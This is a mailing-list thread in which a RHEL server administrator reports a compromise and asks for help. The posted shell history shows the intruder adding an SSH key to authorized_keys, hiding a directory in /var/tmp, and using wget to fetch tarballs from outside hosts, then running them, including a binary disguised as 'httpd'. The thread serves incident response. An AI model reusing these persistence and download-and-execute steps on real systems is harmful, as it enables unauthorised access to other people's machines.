i use putty for remotely login On Thu, Jan 28, 2010 at 11:59 AM, Joy Methew <ml4joy@xxxxxxxxx> wrote: > still i m thinking how he/she got my password?? > > > > On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy@xxxxxxxxx> wrote: > >> i have changed my root password >> >> >> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan < >> Wahyu.Darmawan@xxxxxxxxx> wrote: >> >>> You may change your root password first, and then you can continue to >>> analyze your system. >>> >>> ________________________________________ >>> From: redhat-list-bounces@xxxxxxxxxx [redhat-list-bounces@xxxxxxxxxx] On >>> Behalf Of Joy Methew [ml4joy@xxxxxxxxx] >>> Sent: Thursday, January 28, 2010 12:59 PM >>> To: General Red Hat Linux discussion list >>> Subject: help >>> >>> Hello all, >>> i m using RHEL5.3 as a my mail server with real ip.i >>> configure my system mostly remotely.last login time of my system 27 jan >>> from this ip 118.129.153.43. >>> than i try to login at 28 jan in morning so i can`t got authentication as >>> root from my last password. >>> than i reboot the system reset my password. >>> i login as a root than i run "last" command i m sending tha first 10 >>> lines >>> of last command...i thinks someone hack my system.i am sending history >>> command output. >>> now i remove .ssh directory and /var/tmp/* >>> >>> please suggest wat is this?? >>> >>> thanks >>> >>> last command out put: >>> root pts/1 117.199.118.234 Thu Jan 28 10:58 still logged in >>> root pts/0 117.199.118.234 Thu Jan 28 10:49 still logged in >>> root tty1 Thu Jan 28 10:48 - 10:52 (00:04) >>> reboot system boot 2.6.18-128.el5PA Thu Jan 28 10:45 (00:25) >>> root pts/2 165.red-79-153-1 Thu Jan 28 01:42 - 01:52 (00:09) >>> root pts/2 165.red-79-153-1 Wed Jan 27 23:02 - 01:27 (02:25) >>> root pts/2 165.red-79-153-1 Wed Jan 27 22:33 - 22:34 (00:00) >>> root pts/3 165.red-79-153-1 Wed Jan 27 22:32 - 22:33 (00:00) >>> root pts/2 118.129.153.43 Wed Jan 27 22:31 - 22:32 (00:01) >>> root pts/2 117.199.114.189 Wed Jan 27 15:47 - 15:51 (00:03) >>> >>> What is 165.red-79........this is nt my ip. >>> >>> >>> History Output >>> >>> 115 cat /proc/cpuinfo >>> 116 mkdir .ssh >>> 117 cd .ssh >>> 118 echo ssh-rsa >>> >>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== >>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 >>> ~/.ssh/authorized_keys >>> 119 cd /var/tmp >>> 120 mkdir " " >>> 121 cd " " >>> 122 passwd >>> 123 echo ssh-rsa >>> >>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH+iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ+xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf+I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ== >>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh; chmod 600 >>> ~/.ssh/authorized_keys >>> 124 ps -x >>> 125 cd /var/tmp >>> 126 w >>> 127 wget http://kok.ucoz.de/gosh.tgz >>> 128 tar xvf gosh.tgz >>> 129 cd gosh >>> 130 chmod +x * >>> 131 ./go.sh 121 >>> 132 w >>> 133 ps -x >>> 134 ps -aux >>> 135 cd /var/tmp >>> 136 cd " " >>> 137 ls -a >>> 138 wget http://helpbnc.myftp.org/danger/fld.tgz >>> 139 tar xzvf fld.tgz >>> 140 cd fld >>> 141 chmod +x * >>> 142 nano cyc.acc >>> 143 nano cyc.acc.1 >>> 144 nano cyc.set >>> 145 ./httpd >>> 146 w >>> -- >>> redhat-list mailing list >>> unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe >>> https://www.redhat.com/mailman/listinfo/redhat-list >>> >>> -- >>> redhat-list mailing list >>> unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe >>> https://www.redhat.com/mailman/listinfo/redhat-list >>> >> >> > -- redhat-list mailing list unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe https://www.redhat.com/mailman/listinfo/redhat-list
